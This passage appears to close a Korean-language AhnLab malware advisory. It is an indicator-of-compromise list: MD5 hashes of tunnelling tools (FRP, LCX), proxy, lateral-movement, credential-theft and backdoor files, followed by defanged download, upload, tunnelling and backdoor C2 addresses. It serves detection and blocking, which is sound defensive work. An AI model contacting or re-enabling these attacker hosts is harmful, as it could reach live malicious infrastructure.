b998a39b31ad9b409d68dcb74ac6d97d d5054ed83e63f911be46b3ff8af82267 e7b7bf4c2ed49575bedabdce2385c8d5 f01a9a2d1e31332ed36c1a4d2839f412 d4d8c9be9a4a6499d254e845c6835f5f – FRP 4eb5eb52061cc8cf06e28e7eb20cd055 0cc22fd05a3e771b09b584db0a161363 8de8dfcb99621b21bf66a3ef2fcd8138 df8f2dc27cbbd10d944210b19f97dafd 2866f3c8dfd5698e7c58d166a5857e1e cbee2fd458ff686a4cd2dde42306bba1 3dc8b64b498220612a43d36049f055ab 31c4a3f16baa5e0437fdd4603987b812 b33a27bfbe7677df4a465dfa9795ff4a 7d9c233b8c9e3f0ea290d2b84593c842 c4f18576fd1177ba1ef54e884cb7a79d 5d33609af27ea092f80aff1af6ddf98d 622f060fce624bdca9a427c3edec1663 1f2432ec77b750aa3e3f72c866584dc3 d331602d190c0963ec83e46f5a5cd54a 21d268341884c4fc62b5af7a3b433d90 – FRP_INI 6a20945ae9f7c9e1a28015e40758bb4f a29f39713ce6a92e642d14374e7203f0 7ce988f1b593e96206a1ef57eb1bec8a fc9abba1f212db8eeac7734056b81a6e 9f55b31c66a01953c17eea6ace66f636 33129e959221bf9d5211710747fddabe 48b99c2f0441f5a4794afb4f89610e48 28e026b9550e4eb37435013425abfa38 2ceabffe2d40714e5535212d46d78119 c72750485db39d0c04469cd6b100a595 68403cc3a6fcbeb9e5e9f7263d04c02f 52ff6e3e942ac8ee012dcde89e7a1116 d82481e9bc50d9d9aeb9d56072bf3cfe 22381941763862631070e043d4dd0dc2 6b5bccf615bf634b0e55a86a9c24c902 942d949a28b2921fb980e2d659e6ef75 059d98dcb83be037cd9829d31c096dab cca50cdd843aa824e5eef5f05e74f4a5 f6f0d44aa5e3d83bb1ac777c9cea7060 0ca345bc074fa2ef7a2797b875b6cd4d f6da8dc4e1226aa2d0dabc32acd06915 0bbfaea19c8d1444ae282ff5911a527b – LCX a69d3580921ec8adce64c9b38ac3653a c4e39c1fc0e1b165319fa533a9795c44 fb6bf74c6c1f2482e914816d6e97ce09 678dbe60e15d913fb363c8722bde313d – 프록시 ETC e0f4afe374d75608d604fbf108eac64f f5271a6d909091527ed9f30eafa0ded6 ae8acf66bfe3a44148964048b826d005 – 측면이동 6983f7001de10f4d19fc2d794c3eb534 fcb7f7dab6d401a17bd436fc12a84623 – 정보 수집 및 자격 증명 탈취 bb8bdb3e8c92e97e2f63626bc3b254c4 80f421c5fd5b28fc05b485de4f7896a1 a03b57cc0103316e974bbb0f159f78f6 46f366e3ee36c05ab5a7a319319f7c72 7bd775395b821e158a6961c573e6fd43 b434df66d0dd15c2f5e5b2975f2cfbe2 c17cfe533f8ce24f0e41bd7e14a35e5e – 백도어 011cedd9932207ee5539895e2a1ed60a bc744a4bf1c158dba37276bf7db50d85 23c0500a69b71d5942585bb87559fe83 53271b2ab6c327a68e78a7c0bf9f4044 c87ac56d434195c527d3358e12e2b2e0 |
- C2 및 URL (악용된 국내 기업 서버의 경우 표기 안함)
| – Download C2 91.217.139[.]117 – Upload C2 205.185.122[.]95 91.217.139[.]117 – FRP & LCX C2 hxxp://sk1.m00nlight[.]top:80 (45.136.186.19) //MOACK_Co_LTD 업체 서버 hxxps://fk.m00nlight[.]top:443 (45.136.186.175:443) //MOACK_Co_LTD 업체 서버 hxxps://aa.zxcss[.]com:443 (45.93.31.122) //MOACK_Co_LTD 업체 서버 45.93.31[.]75:7777 //MOACK_Co_LTD 업체 서버 45.93.28[.]103:8080 //MOACK_Co_LTD 업체 서버 103.118.42[.]208 101.43.121[.]50 – Backdoor C2 45.93.31[.]75 //MOACK_Co_LTD 업체 서버 |
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보